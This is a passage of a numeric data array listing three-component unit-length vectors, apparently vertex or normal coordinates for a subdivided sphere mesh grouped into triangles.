[-0.480284929276,0.284414708614,0.829719662666],
[-0.346611320972,0.436200261116,0.830415487289],
[-0.379529476166,0.486395716667,0.787004828453],
[-0.416404157877,0.419940322638,0.806385576725],
[-0.485873311758,0.400663375854,0.776785671711],
[-0.520354926586,0.44894811511,0.726413309574],
[-0.553625464439,0.378517180681,0.74177056551],
[-0.416404157877,0.419940322638,0.806385576725],
[-0.485873311758,0.400663375854,0.776785671711],
[-0.450116455555,0.352179646492,0.820587992668],
[-0.665048420429,0.213841319084,0.715529501438],
[-0.700865805149,0.256401896477,0.665616393089],
[-0.718357801437,0.188148602843,0.669747889042],
[-0.618283927441,0.353819847107,0.701809465885],
[-0.65135627985,0.398910075426,0.645450055599],
[-0.678621411324,0.327040165663,0.657660841942],
[-0.733673810959,0.298754066229,0.610302150249],
[-0.762617051601,0.340069264174,0.550243675709],
[-0.782811582088,0.269586592913,0.560828924179],
[-0.678621411324,0.327040165663,0.657660841942],
[-0.733673810959,0.298754066229,0.610302150249],
[-0.700865805149,0.256401896477,0.665616393089],
[-0.480284929276,0.284414708614,0.829719662666],
[-0.545040607452,0.26241543889,0.796284377575],
[-0.506734728813,0.217834427953,0.834127128124],
[-0.553625464439,0.378517180681,0.74177056551],
[-0.618283927441,0.353819847107,0.701809465885],
[-0.582528710365,0.308011889458,0.752189457417],
[-0.606988489628,0.238753452897,0.757998526096],
[-0.665048420429,0.213841319084,0.715529501438],
[-0.627150595188,0.171839639544,0.759706020355],
[-0.582528710365,0.308011889458,0.752189457417],
[-0.606988489628,0.238753452897,0.757998526096],
[-0.545040607452,0.26241543889,0.796284377575],
[-0.269586592913,0.560828924179,0.782811582088],
[-0.298754066229,0.610302150249,0.733673810959],
[-0.340069264174,0.550243675709,0.762617051601],
[-0.188148602843,0.669747889042,0.718357801437],
[-0.213841319084,0.715529501438,0.665048420429],
[-0.256401896477,0.665616393089,0.700865805149],
[-0.327040165663,0.657660841942,0.678621411324],
[-0.353819847107,0.701809465885,0.618283927441],
[-0.398910075426,0.645450055599,0.65135627985],
[-0.256401896477,0.665616393089,0.700865805149],
[-0.327040165663,0.657660841942,0.678621411324],
[-0.298754066229,0.610302150249,0.733673810959],
[-0.108097285032,0.757922053337,0.643326640129],
[-0.131048902869,0.798110127449,0.588087081909],
[-0.171839639544,0.759706020355,0.627150595188],
[-0.0339771322906,0.82464236021,0.564633131027],
[-0.0549761541188,0.858619451523,0.509656965733],
[-0.091976031661,0.830952167511,0.548688352108],
[-0.153434738517,0.834331154823,0.529480218887],
[-0.174905076623,0.866019308567,0.468421578407],
[-0.217834427953,0.834127128124,0.506734728813],
[-0.091976031661,0.830952167511,0.548688352108],
[-0.153434738517,0.834331154823,0.529480218887],
[-0.131048902869,0.798110127449,0.588087081909],
[-0.378517180681,0.74177056551,0.553625464439],
[-0.400663375854,0.776785671711,0.485873311758],
[-0.44894811511,0.726413309574,0.520354926586],
[-0.284414708614,0.829719662666,0.480284929276],
[-0.3044308424,0.857896447182,0.413926929235],
[-0.352179646492,0.820587992668,0.450116455555],
[-0.419940322638,0.806385576725,0.416404157877],
[-0.436200261116,0.830415487289,0.346611320972],
[-0.486395716667,0.787004828453,0.379529476166],
[-0.352179646492,0.820587992668,0.450116455555],
[-0.419940322638,0.806385576725,0.416404157877],
[-0.400663375854,0.776785671711,0.485873311758],
[-0.171839639544,0.759706020355,0.627150595188],
[-0.238753452897,0.757998526096,0.606988489628],
[-0.213841319084,0.715529501438,0.665048420429],
[-0.217834427953,0.834127128124,0.506734728813],
[-0.284414708614,0.829719662666,0.480284929276],
[-0.26241543889,0.796284377575,0.545040607452],
[-0.308011889458,0.752189457417,0.582528710365],
[-0.378517180681,0.74177056551,0.553625464439],
[-0.353819847107,0.701809465885,0.618283927441],
[-0.26241543889,0.796284377575,0.545040607452],
[-0.308011889458,0.752189457417,0.582528710365],
[-0.238753452897,0.757998526096,0.606988489628],
[-0.787004828453,0.379529476166,0.486395716667],
[-0.806385576725,0.416404157877,0.419940322638],
[-0.830415487289,0.346611320972,0.436200261116],
[-0.726413309574,0.520354926586,0.44894811511],
[-0.74177056551,0.553625464439,0.378517180681],
[-0.776785671711,0.485873311758,0.400663375854],
[-0.820587992668,0.450116455555,0.352179646492],
[-0.829719662666,0.480284929276,0.284414708614],
[-0.857896447182,0.413926929235,0.3044308424],
[-0.776785671711,0.485873311758,0.400663375854],
[-0.820587992668,0.450116455555,0.352179646492],
[-0.806385576725,0.416404157877,0.419940322638],
[-0.645450055599,0.65135627985,0.398910075426],
[-0.657660841942,0.678621411324,0.327040165663],
[-0.701809465885,0.618283927441,0.353819847107],
[-0.550243675709,0.762617051601,0.340069264174],
[-0.560828924179,0.782811582088,0.269586592913],
[-0.610302150249,0.733673810959,0.298754066229],
[-0.665616393089,0.700865805149,0.256401896477],
[-0.669747889042,0.718357801437,0.188148602843],
[-0.715529501438,0.665048420429,0.213841319084],
[-0.610302150249,0.733673810959,0.298754066229],
[-0.665616393089,0.700865805149,0.256401896477],
[-0.657660841942,0.678621411324,0.327040165663],
[-0.834127128124,0.506734728813,0.217834427953],
[-0.834331154823,0.529480218887,0.153434738517],
[-0.866019308567,0.468421578407,0.174905076623],
[-0.759706020355,0.627150595188,0.171839639544],
[-0.757922053337,0.643326640129,0.108097285032],
[-0.798110127449,0.588087081909,0.131048902869],
[-0.830952167511,0.548688352108,0.091976031661],
[-0.82464236021,0.564633131027,0.0339771322906],
[-0.858619451523,0.509656965733,0.0549761541188],
[-0.798110127449,0.588087081909,0.131048902869],
[-0.830952167511,0.548688352108,0.091976031661],
[-0.834331154823,0.529480218887,0.153434738517],
[-0.701809465885,0.618283927441,0.353819847107],
[-0.752189457417,0.582528710365,0.308011889458],
[-0.74177056551,0.553625464439,0.378517180681],
[-0.715529501438,0.665048420429,0.213841319084],
[-0.759706020355,0.627150595188,0.171839639544],
[-0.757998526096,0.606988489628,0.238753452897],
[-0.796284377575,0.545040607452,0.26241543889],
[-0.834127128124,0.506734728813,0.217834427953],
[-0.829719662666,0.480284929276,0.284414708614],
[-0.757998526096,0.606988489628,0.238753452897],
[-0.796284377575,0.545040607452,0.26241543889],
[-0.752189457417,0.582528710365,0.308011889458],
[-0.340069264174,0.550243675709,0.762617051601],
[-0.411682873964,0.535965919495,0.737060189247],
[-0.379529476166,0.486395716667,0.787004828453],
[-0.398910075426,0.645450055599,0.65135627985],
[-0.470621615648,0.628728508949,0.619044244289],
[-0.44230055809,0.58378881216,0.680853009224],
[-0.483050197363,0.517854511738,0.706037700176],
[-0.552667617798,0.495975226164,0.669751524925],
[-0.520354926586,0.44894811511,0.726413309574],
[-0.44230055809,0.58378881216,0.680853009224],
[-0.483050197363,0.517854511738,0.706037700176],
[-0.411682873964,0.535965919495,0.737060189247],
[-0.44894811511,0.726413309574,0.520354926586],
[-0.517854511738,0.706037700176,0.483050197363],
[-0.495975226164,0.669751524925,0.552667617798],
[-0.486395716667,0.787004828453,0.379529476166],
[-0.550243675709,0.762617051601,0.340069264174],
[-0.535965919495,0.737060189247,0.411682873964],
[-0.58378881216,0.680853009224,0.44230055809],
[-0.645450055599,0.65135627985,0.398910075426],
[-0.628728508949,0.619044244289,0.470621615648],
[-0.535965919495,0.737060189247,0.411682873964],
[-0.58378881216,0.680853009224,0.44230055809],
[-0.517854511738,0.706037700176,0.483050197363],
[-0.619044244289,0.470621615648,0.628728508949],
[-0.680853009224,0.44230055809,0.58378881216],
[-0.65135627985,0.398910075426,0.645450055599],
[-0.669751524925,0.552667617798,0.495975226164],
[-0.726413309574,0.520354926586,0.44894811511],
[-0.706037700176,0.483050197363,0.517854511738],
[-0.737060189247,0.411682873964,0.535965919495],
[-0.787004828453,0.379529476166,0.486395716667],
[-0.762617051601,0.340069264174,0.550243675709],
[-0.706037700176,0.483050197363,0.517854511738],
[-0.737060189247,0.411682873964,0.535965919495],
[-0.680853009224,0.44230055809,0.58378881216],
[-0.495975226164,0.669751524925,0.552667617798],
[-0.540649950504,0.607478022575,0.581951975822],
[-0.470621615648,0.628728508949,0.619044244289],
[-0.628728508949,0.619044244289,0.470621615648],
[-0.669751524925,0.552667617798,0.495975226164],
[-0.607478022575,0.581951975822,0.540649950504],
[-0.581951975822,0.540649950504,0.607478022575],
[-0.619044244289,0.470621615648,0.628728508949],
[-0.552667617798,0.495975226164,0.669751524925],
[-0.607478022575,0.581951975822,0.540649950504],
[-0.581951975822,0.540649950504,0.607478022575],
[-0.540649950504,0.607478022575,0.581951975822],
[-0.0339771322906,0.82464236021,0.564633131027],
[0.0,0.79582041502,0.605532705784],
[0.0339771322906,0.82464236021,0.564633131027],
[-0.108097285032,0.757922053337,0.643326640129],
[-0.0744211226702,0.722495436668,0.687358558178],
[-0.0362210273743,0.761889100075,0.646693944931],
[0.0362210273743,0.761889100075,0.646693944931],
[0.0744211226702,0.722495436668,0.687358558178],
[0.108097285032,0.757922053337,0.643326640129],
[-0.0362210273743,0.761889100075,0.646693944931],
[0.0362210273743,0.761889100075,0.646693944931],
[0.0,0.79582041502,0.605532705784],
[-0.188148602843,0.669747889042,0.718357801437],
[-0.154971644282,0.62687343359,0.763553202152],
[-0.114190116525,0.677466154099,0.726636230946],
[-0.269586592913,0.560828924179,0.782811582088],
[-0.236761152744,0.510783493519,0.826465010643],
[-0.196083456278,0.571085453033,0.797127783298],
[-0.119124859571,0.578244268894,0.807120084763],
[-0.0809632539749,0.524005174637,0.847858190536],
[-0.0399611219764,0.581926107407,0.81225925684],
[-0.196083456278,0.571085453033,0.797127783298],
[-0.119124859571,0.578244268894,0.807120084763],
[-0.154971644282,0.62687343359,0.763553202152],
[0.114190116525,0.677466154099,0.726636230946],
[0.154971644282,0.62687343359,0.763553202152],
[0.188148602843,0.669747889042,0.718357801437],
[0.0399611219764,0.581926107407,0.81225925684],
[0.0809632539749,0.524005174637,0.847858190536],
[0.119124859571,0.578244268894,0.807120084763],
[0.196083456278,0.571085453033,0.797127783298],
[0.236761152744,0.510783493519,0.826465010643],
[0.269586592913,0.560828924179,0.782811582088],
[0.119124859571,0.578244268894,0.807120084763],
[0.196083456278,0.571085453033,0.797127783298],
[0.154971644282,0.62687343359,0.763553202152],
[-0.114190116525,0.677466154099,0.726636230946],
[-0.0382858961821,0.68142670393,0.730884253979],
[-0.0744211226702,0.722495436668,0.687358558178],
[-0.0399611219764,0.581926107407,0.81225925684],
[0.0399611219764,0.581926107407,0.81225925684],
[0.0,0.634539365768,0.772890508175],
[0.0382858961821,0.68142670393,0.730884253979],
[0.114190116525,0.677466154099,0.726636230946],
[0.0744211226702,0.722495436668,0.687358558178],
[0.0,0.634539365768,0.772890508175],
[0.0382858961821,0.68142670393,0.730884253979],
[-0.0382858961821,0.68142670393,0.730884253979],
[-0.346611320972,0.436200261116,0.830415487289],
[-0.313733518124,0.380723625422,0.869839549065],
[-0.276221334934,0.446935534477,0.85085272789],
[-0.413926929235,0.3044308424,0.857896447182],
[-0.380633711815,0.246351331472,0.891307473183],
[-0.348686188459,0.313436716795,0.883275330067],
[-0.277958005667,0.321246802807,0.905284404755],
[-0.239766731858,0.258633822203,0.935745954514],
[-0.202408134937,0.327503234148,0.922915279865],
[-0.348686188459,0.313436716795,0.883275330067],
[-0.277958005667,0.321246802807,0.905284404755],
[-0.313733518124,0.380723625422,0.869839549065],
[-0.468421578407,0.174905076623,0.866019308567],
[-0.434652328491,0.117213711143,0.892938017845],
[-0.409316182137,0.180623859167,0.894335091114],
[-0.509656965733,0.0549761541188,0.858619451523],
[-0.475679844618,0.0,0.8796184659],
[-0.456712335348,0.0568443164229,0.887796461582],
[-0.398431301117,0.0586068555713,0.915323853493],
[-0.360324263573,0.0,0.932827115059],
[-0.334895044565,0.0602079555392,0.940329909325],
[-0.456712335348,0.0568443164229,0.887796461582],
[-0.398431301117,0.0586068555713,0.915323853493],
[-0.434652328491,0.117213711143,0.892938017845],
[-0.199805602431,0.193975359201,0.960443258286],
[-0.158833146095,0.128498718143,0.978907585144],
[-0.121444880962,0.196501940489,0.97295331955],
[-0.266443610191,0.0615878328681,0.961880862713],
[-0.225778326392,0.0,0.974178731441],
[-0.193714544177,0.0626873448491,0.979053080082],
[-0.117650069296,0.0634539350867,0.991025745869],
[-0.0770247355103,0.0,0.997029185295],
[-0.0394601933658,0.0638479366899,0.997179210186],
[-0.193714544177,0.0626873448491,0.979053080082],
[-0.117650069296,0.0634539350867,0.991025745869],
[-0.158833146095,0.128498718143,0.978907585144],
[-0.409316182137,0.180623859167,0.894335091114],
[-0.34457308054,0.185843646526,0.920180141926],
[-0.380633711815,0.246351331472,0.891307473183],
[-0.334895044565,0.0602079555392,0.940329909325],
[-0.266443610191,0.0615878328681,0.961880862713],
[-0.306287169456,0.123895764351,0.943842172623],
[-0.274516820908,0.190361812711,0.942551255226],
[-0.199805602431,0.193975359201,0.960443258286],
[-0.239766731858,0.258633822203,0.935745954514],
[-0.306287169456,0.123895764351,0.943842172623],
[-0.274516820908,0.190361812711,0.942551255226],
[-0.34457308054,0.185843646526,0.920180141926],
[0.276221334934,0.446935534477,0.85085272789],
[0.313733518124,0.380723625422,0.869839549065],
[0.346611320972,0.436200261116,0.830415487289],
[0.202408134937,0.327503234148,0.922915279865],
[0.239766731858,0.258633822203,0.935745954514],
[0.277958005667,0.321246802807,0.905284404755],
[0.348686188459,0.313436716795,0.883275330067],
[0.380633711815,0.246351331472,0.891307473183],
[0.413926929235,0.3044308424,0.857896447182],
[0.277958005667,0.321246802807,0.905284404755],
[0.348686188459,0.313436716795,0.883275330067],
[0.313733518124,0.380723625422,0.869839549065],
[0.121444880962,0.196501940489,0.97295331955],
[0.158833146095,0.128498718143,0.978907585144],
[0.199805602431,0.193975359201,0.960443258286],
[0.0394601933658,0.0638479366899,0.997179210186],
[0.0770247355103,0.0,0.997029185295],
[0.117650069296,0.0634539350867,0.991025745869],
[0.193714544177,0.0626873448491,0.979053080082],
[0.225778326392,0.0,0.974178731441],
[0.266443610191,0.0615878328681,0.961880862713],
[0.117650069296,0.0634539350867,0.991025745869],
[0.193714544177,0.0626873448491,0.979053080082],
[0.158833146095,0.128498718143,0.978907585144],
[0.409316182137,0.180623859167,0.894335091114],
[0.434652328491,0.117213711143,0.892938017845],
[0.468421578407,0.174905076623,0.866019308567],
[0.334895044565,0.0602079555392,0.940329909325],
[0.360324263573,0.0,0.932827115059],
[0.398431301117,0.0586068555713,0.915323853493],
[0.456712335348,0.0568443164229,0.887796461582],
[0.475679844618,0.0,0.8796184659],
[0.509656965733,0.0549761541188,0.858619451523],
[0.398431301117,0.0586068555713,0.915323853493],
[0.456712335348,0.0568443164229,0.887796461582],
[0.434652328491,0.117213711143,0.892938017845],
[0.199805602431,0.193975359201,0.960443258286],
[0.274516820908,0.190361812711,0.942551255226],
[0.239766731858,0.258633822203,0.935745954514],
[0.266443610191,0.0615878328681,0.961880862713],
[0.334895044565,0.0602079555392,0.940329909325],
[0.306287169456,0.123895764351,0.943842172623],
[0.34457308054,0.185843646526,0.920180141926],
[0.409316182137,0.180623859167,0.894335091114],
[0.380633711815,0.246351331472,0.891307473183],
[0.306287169456,0.123895764351,0.943842172623],
[0.34457308054,0.185843646526,0.920180141926],
[0.274516820908,0.190361812711,0.942551255226],
[-0.276221334934,0.446935534477,0.85085272789],
[-0.20109423995,0.455528259277,0.867211103439],
[-0.236761152744,0.510783493519,0.826465010643],
[-0.202408134937,0.327503234148,0.922915279865],
[-0.123069040477,0.33188316226,0.935258030891],
[-0.162998497486,0.395605653524,0.903840482235],
[-0.122248865664,0.461539924145,0.878655850887],
[-0.0410230122507,0.464636415243,0.88455080986],
[-0.0809632539749,0.524005174637,0.847858190536],
[-0.162998497486,0.395605653524,0.903840482235],
[-0.122248865664,0.461539924145,0.878655850887],
[-0.20109423995,0.455528259277,0.867211103439],
[-0.121444880962,0.196501940489,0.97295331955],
[-0.0407496243715,0.197802826762,0.979394435883],
[-0.0820460245013,0.265506535769,0.960611641407],
[-0.0394601933658,0.0638479366899,0.997179210186],
[0.0394601933658,0.0638479366899,0.997179210186],
[0.0,0.130150929093,0.991494178772],
[0.0407496243715,0.197802826762,0.979394435883],
[0.121444880962,0.196501940489,0.97295331955],
[0.0820460245013,0.265506535769,0.960611641407],
[0.0,0.130150929093,0.991494178772],
[0.0407496243715,0.197802826762,0.979394435883],
[-0.0407496243715,0.197802826762,0.979394435883],
[0.0410230122507,0.464636415243,0.88455080986],
[0.122248865664,0.461539924145,0.878655850887],
[0.0809632539749,0.524005174637,0.847858190536],
[0.123069040477,0.33188316226,0.935258030891],
[0.202408134937,0.327503234148,0.922915279865],
[0.162998497486,0.395605653524,0.903840482235],
[0.20109423995,0.455528259277,0.867211103439],
[0.276221334934,0.446935534477,0.85085272789],
[0.236761152744,0.510783493519,0.826465010643],
[0.162998497486,0.395605653524,0.903840482235],
[0.20109423995,0.455528259277,0.867211103439],
[0.122248865664,0.461539924145,0.878655850887],
[-0.0820460245013,0.265506535769,0.960611641407],
[-0.04130198434,0.334140062332,0.941618084908],
[-0.123069040477,0.33188316226,0.935258030891],
[0.0820460245013,0.265506535769,0.960611641407],
[0.123069040477,0.33188316226,0.935258030891],
[0.04130198434,0.334140062332,0.941618084908],
[0.0,0.400968074799,0.916092038155],
[0.0410230122507,0.464636415243,0.88455080986],
[-0.0410230122507,0.464636415243,0.88455080986],
[0.04130198434,0.334140062332,0.941618084908],
[0.0,0.400968074799,0.916092038155],
[-0.04130198434,0.334140062332,0.941618084908],
[-0.0549761541188,0.858619451523,-0.509656965733],
[-0.0568443164229,0.887796461582,-0.456712335348],
[0.0,0.8796184659,-0.475679844618],
[-0.174905076623,0.866019308567,-0.468421578407],
[-0.180623859167,0.894335091114,-0.409316182137],
[-0.117213711143,0.892938017845,-0.434652328491],
[-0.0586068555713,0.915323853493,-0.398431301117],
[-0.0602079555392,0.940329909325,-0.334895044565],
[0.0,0.932827115059,-0.360324263573],
[-0.117213711143,0.892938017845,-0.434652328491],
[-0.0586068555713,0.915323853493,-0.398431301117],
[-0.0568443164229,0.887796461582,-0.456712335348],
[-0.3044308424,0.857896447182,-0.413926929235],
[-0.313436716795,0.883275330067,-0.348686188459],
[-0.246351331472,0.891307473183,-0.380633711815],
[-0.436200261116,0.830415487289,-0.346611320972],
[-0.446935534477,0.85085272789,-0.276221334934],
[-0.380723625422,0.869839549065,-0.313733518124],
[-0.321246802807,0.905284404755,-0.277958005667],
[-0.327503234148,0.922915279865,-0.202408134937],
[-0.258633822203,0.935745954514,-0.239766731858],
[-0.380723625422,0.869839549065,-0.313733518124],
[-0.321246802807,0.905284404755,-0.277958005667],
[-0.313436716795,0.883275330067,-0.348686188459],
[-0.0615878328681,0.961880862713,-0.266443610191],
[-0.0626873448491,0.979053080082,-0.193714544177],
[0.0,0.974178731441,-0.225778326392],
[-0.193975359201,0.960443258286,-0.199805602431],
[-0.196501940489,0.97295331955,-0.121444880962],
[-0.128498718143,0.978907585144,-0.158833146095],
[-0.0634539350867,0.991025745869,-0.117650069296],
[-0.0638479366899,0.997179210186,-0.0394601933658],
[0.0,0.997029185295,-0.0770247355103],
[-0.128498718143,0.978907585144,-0.158833146095],
[-0.0634539350867,0.991025745869,-0.117650069296],
[-0.0626873448491,0.979053080082,-0.193714544177],
[-0.246351331472,0.891307473183,-0.380633711815],
[-0.185843646526,0.920180141926,-0.34457308054],
[-0.180623859167,0.894335091114,-0.409316182137],
[-0.258633822203,0.935745954514,-0.239766731858],
[-0.193975359201,0.960443258286,-0.199805602431],
[-0.190361812711,0.942551255226,-0.274516820908],
[-0.123895764351,0.943842172623,-0.306287169456],
[-0.0615878328681,0.961880862713,-0.266443610191],
[-0.0602079555392,0.940329909325,-0.334895044565],
[-0.190361812711,0.942551255226,-0.274516820908],
[-0.123895764351,0.943842172623,-0.306287169456],
[-0.185843646526,0.920180141926,-0.34457308054],
[-0.560828924179,0.782811582088,-0.269586592913],
[-0.571085453033,0.797127783298,-0.196083456278],
[-0.510783493519,0.826465010643,-0.236761152744],
[-0.669747889042,0.718357801437,-0.188148602843],
[-0.677466154099,0.726636230946,-0.114190116525],
[-0.62687343359,0.763553202152,-0.154971644282],
[-0.578244268894,0.807120084763,-0.119124859571],
[-0.581926107407,0.81225925684,-0.0399611219764],
[-0.524005174637,0.847858190536,-0.0809632539749],
[-0.62687343359,0.763553202152,-0.154971644282],
[-0.578244268894,0.807120084763,-0.119124859571],
[-0.571085453033,0.797127783298,-0.196083456278],
[-0.757922053337,0.643326640129,-0.108097285032],
[-0.761889100075,0.646693944931,-0.0362210273743],
[-0.722495436668,0.687358558178,-0.0744211226702],
[-0.82464236021,0.564633131027,-0.0339771322906],
[-0.82464236021,0.564633131027,0.0339771322906],
[-0.79582041502,0.605532705784,0.0],
[-0.761889100075,0.646693944931,0.0362210273743],
[-0.757922053337,0.643326640129,0.108097285032],
[-0.722495436668,0.687358558178,0.0744211226702],
[-0.79582041502,0.605532705784,0.0],
[-0.761889100075,0.646693944931,0.0362210273743],
[-0.761889100075,0.646693944931,-0.0362210273743],
[-0.581926107407,0.81225925684,0.0399611219764],
[-0.578244268894,0.807120084763,0.119124859571],
[-0.524005174637,0.847858190536,0.0809632539749],
[-0.677466154099,0.726636230946,0.114190116525],
[-0.669747889042,0.718357801437,0.188148602843],
[-0.62687343359,0.763553202152,0.154971644282],
[-0.571085453033,0.797127783298,0.196083456278],
[-0.560828924179,0.782811582088,0.269586592913],
[-0.510783493519,0.826465010643,0.236761152744],
[-0.62687343359,0.763553202152,0.154971644282],
[-0.571085453033,0.797127783298,0.196083456278],
[-0.578244268894,0.807120084763,0.119124859571],
[-0.722495436668,0.687358558178,-0.0744211226702],
[-0.68142670393,0.730884253979,-0.0382858961821],
[-0.677466154099,0.726636230946,-0.114190116525],
[-0.722495436668,0.687358558178,0.0744211226702],
[-0.677466154099,0.726636230946,0.114190116525],
[-0.68142670393,0.730884253979,0.0382858961821],
[-0.634539365768,0.772890508175,0.0],
[-0.581926107407,0.81225925684,0.0399611219764],
[-0.581926107407,0.81225925684,-0.0399611219764],
[-0.68142670393,0.730884253979,0.0382858961821],
[-0.634539365768,0.772890508175,0.0],
[-0.68142670393,0.730884253979,-0.0382858961821],
[-0.0638479366899,0.997179210186,0.0394601933658],
[-0.0634539350867,0.991025745869,0.117650069296],
[0.0,0.997029185295,0.0770247355103],
[-0.196501940489,0.97295331955,0.121444880962],
[-0.193975359201,0.960443258286,0.199805602431],
[-0.128498718143,0.978907585144,0.158833146095],
[-0.0626873448491,0.979053080082,0.193714544177],
[-0.0615878328681,0.961880862713,0.266443610191],
[0.0,0.974178731441,0.225778326392],
[-0.128498718143,0.978907585144,0.158833146095],
[-0.0626873448491,0.979053080082,0.193714544177],
[-0.0634539350867,0.991025745869,0.117650069296],
[-0.327503234148,0.922915279865,0.202408134937],
[-0.321246802807,0.905284404755,0.277958005667],
[-0.258633822203,0.935745954514,0.239766731858],
[-0.446935534477,0.85085272789,0.276221334934],
[-0.436200261116,0.830415487289,0.346611320972],
[-0.380723625422,0.869839549065,0.313733518124],
[-0.313436716795,0.883275330067,0.348686188459],
[-0.3044308424,0.857896447182,0.413926929235],
[-0.246351331472,0.891307473183,0.380633711815],
[-0.380723625422,0.869839549065,0.313733518124],
[-0.313436716795,0.883275330067,0.348686188459],
[-0.321246802807,0.905284404755,0.277958005667],
[-0.0602079555392,0.940329909325,0.334895044565],
[-0.0586068555713,0.915323853493,0.398431301117],
[0.0,0.932827115059,0.360324263573],
[-0.180623859167,0.894335091114,0.409316182137],
[-0.174905076623,0.866019308567,0.468421578407],
[-0.117213711143,0.892938017845,0.434652328491],
[-0.0568443164229,0.887796461582,0.456712335348],
[-0.0549761541188,0.858619451523,0.509656965733],
[0.0,0.8796184659,0.475679844618],
[-0.117213711143,0.892938017845,0.434652328491],
[-0.0568443164229,0.887796461582,0.456712335348],
[-0.0586068555713,0.915323853493,0.398431301117],
[-0.258633822203,0.935745954514,0.239766731858],
[-0.190361812711,0.942551255226,0.274516820908],
[-0.193975359201,0.960443258286,0.199805602431],
[-0.246351331472,0.891307473183,0.380633711815],
[-0.180623859167,0.894335091114,0.409316182137],
[-0.185843646526,0.920180141926,0.34457308054],
[-0.123895764351,0.943842172623,0.306287169456],
[-0.0602079555392,0.940329909325,0.334895044565],
[-0.0615878328681,0.961880862713,0.266443610191],
[-0.185843646526,0.920180141926,0.34457308054],
[-0.123895764351,0.943842172623,0.306287169456],
[-0.190361812711,0.942551255226,0.274516820908],
[-0.510783493519,0.826465010643,-0.236761152744],
[-0.455528259277,0.867211103439,-0.20109423995],
[-0.446935534477,0.85085272789,-0.276221334934],
[-0.524005174637,0.847858190536,-0.0809632539749],
[-0.464636415243,0.88455080986,-0.0410230122507],
[-0.461539924145,0.878655850887,-0.122248865664],
[-0.395605653524,0.903840482235,-0.162998497486],
[-0.33188316226,0.935258030891,-0.123069040477],
[-0.327503234148,0.922915279865,-0.202408134937],
[-0.461539924145,0.878655850887,-0.122248865664],
[-0.395605653524,0.903840482235,-0.162998497486],
[-0.455528259277,0.867211103439,-0.20109423995],
[-0.524005174637,0.847858190536,0.0809632539749],
[-0.461539924145,0.878655850887,0.122248865664],
[-0.464636415243,0.88455080986,0.0410230122507],
[-0.510783493519,0.826465010643,0.236761152744],
[-0.446935534477,0.85085272789,0.276221334934],
[-0.455528259277,0.867211103439,0.20109423995],
[-0.395605653524,0.903840482235,0.162998497486],
[-0.327503234148,0.922915279865,0.202408134937],
[-0.33188316226,0.935258030891,0.123069040477],
[-0.455528259277,0.867211103439,0.20109423995],
[-0.395605653524,0.903840482235,0.162998497486],
[-0.461539924145,0.878655850887,0.122248865664],
[-0.265506535769,0.960611641407,-0.0820460245013],
[-0.197802826762,0.979394435883,-0.0407496243715],
[-0.196501940489,0.97295331955,-0.121444880962],
[-0.265506535769,0.960611641407,0.0820460245013],
[-0.196501940489,0.97295331955,0.121444880962],
[-0.197802826762,0.979394435883,0.0407496243715],
[-0.130150929093,0.991494178772,0.0],
[-0.0638479366899,0.997179210186,0.0394601933658],
[-0.0638479366899,0.997179210186,-0.0394601933658],
[-0.197802826762,0.979394435883,0.0407496243715],
[-0.130150929093,0.991494178772,0.0],
[-0.197802826762,0.979394435883,-0.0407496243715],
[-0.464636415243,0.88455080986,0.0410230122507],
[-0.400968074799,0.916092038155,0.0],
[-0.464636415243,0.88455080986,-0.0410230122507],
[-0.33188316226,0.935258030891,0.123069040477],
[-0.265506535769,0.960611641407,0.0820460245013],
[-0.334140062332,0.941618084908,0.04130198434],
[-0.334140062332,0.941618084908,-0.04130198434],
[-0.265506535769,0.960611641407,-0.0820460245013],
[-0.33188316226,0.935258030891,-0.123069040477],
[-0.334140062332,0.941618084908,0.04130198434],
[-0.334140062332,0.941618084908,-0.04130198434],
[-0.400968074799,0.916092038155,0.0],
[0.564633131027,0.0339771322906,-0.82464236021],
[0.605532705784,0.0,-0.79582041502],
[0.564633131027,-0.0339771322906,-0.82464236021],
[0.643326640129,0.108097285032,-0.757922053337],
[0.687358558178,0.0744211226702,-0.722495436668],
[0.646693944931,0.0362210273743,-0.761889100075],
[0.646693944931,-0.0362210273743,-0.761889100075],
[0.687358558178,-0.0744211226702,-0.722495436668],
[0.643326640129,-0.108097285032,-0.757922053337],
[0.646693944931,0.0362210273743,-0.761889100075],
[0.646693944931,-0.0362210273743,-0.761889100075],
[0.605532705784,0.0,-0.79582041502],
[0.718357801437,0.188148602843,-0.669747889042],
[0.763553202152,0.154971644282,-0.62687343359],
[0.726636230946,0.114190116525,-0.677466154099],
[0.782811582088,0.269586592913,-0.560828924179],
[0.826465010643,0.236761152744,-0.510783493519],
[0.797127783298,0.196083456278,-0.571085453033],
[0.807120084763,0.119124859571,-0.578244268894],
[0.847858190536,0.0809632539749,-0.524005174637],
[0.81225925684,0.0399611219764,-0.581926107407],
[0.797127783298,0.196083456278,-0.571085453033],
[0.807120084763,0.119124859571,-0.578244268894],
[0.763553202152,0.154971644282,-0.62687343359],
[0.726636230946,-0.114190116525,-0.677466154099],
[0.763553202152,-0.154971644282,-0.62687343359],
[0.718357801437,-0.188148602843,-0.669747889042],
[0.81225925684,-0.0399611219764,-0.581926107407],
[0.847858190536,-0.0809632539749,-0.524005174637],
[0.807120084763,-0.119124859571,-0.578244268894],
[0.797127783298,-0.196083456278,-0.571085453033],
[0.826465010643,-0.236761152744,-0.510783493519],
[0.782811582088,-0.269586592913,-0.560828924179],
[0.807120084763,-0.119124859571,-0.578244268894],
[0.797127783298,-0.196083456278,-0.571085453033],
[0.763553202152,-0.154971644282,-0.62687343359],
[0.726636230946,0.114190116525,-0.677466154099],
[0.730884253979,0.0382858961821,-0.68142670393],
[0.687358558178,0.0744211226702,-0.722495436668],
[0.81225925684,0.0399611219764,-0.581926107407],
[0.81225925684,-0.0399611219764,-0.581926107407],
[0.772890508175,0.0,-0.634539365768],
[0.730884253979,-0.0382858961821,-0.68142670393],
[0.726636230946,-0.114190116525,-0.677466154099],
[0.687358558178,-0.0744211226702,-0.722495436668],
[0.772890508175,0.0,-0.634539365768],
[0.730884253979,-0.0382858961821,-0.68142670393],
[0.730884253979,0.0382858961821,-0.68142670393],
[0.830415487289,0.346611320972,-0.436200261116],
[0.869839549065,0.313733518124,-0.380723625422],
[0.85085272789,0.276221334934,-0.446935534477],
[0.857896447182,0.413926929235,-0.3044308424],
[0.891307473183,0.380633711815,-0.246351331472],
[0.883275330067,0.348686188459,-0.313436716795],
[0.905284404755,0.277958005667,-0.321246802807],
[0.935745954514,0.239766731858,-0.258633822203],
[0.922915279865,0.202408134937,-0.327503234148],
[0.883275330067,0.348686188459,-0.313436716795],
[0.905284404755,0.277958005667,-0.321246802807],
[0.869839549065,0.313733518124,-0.380723625422],
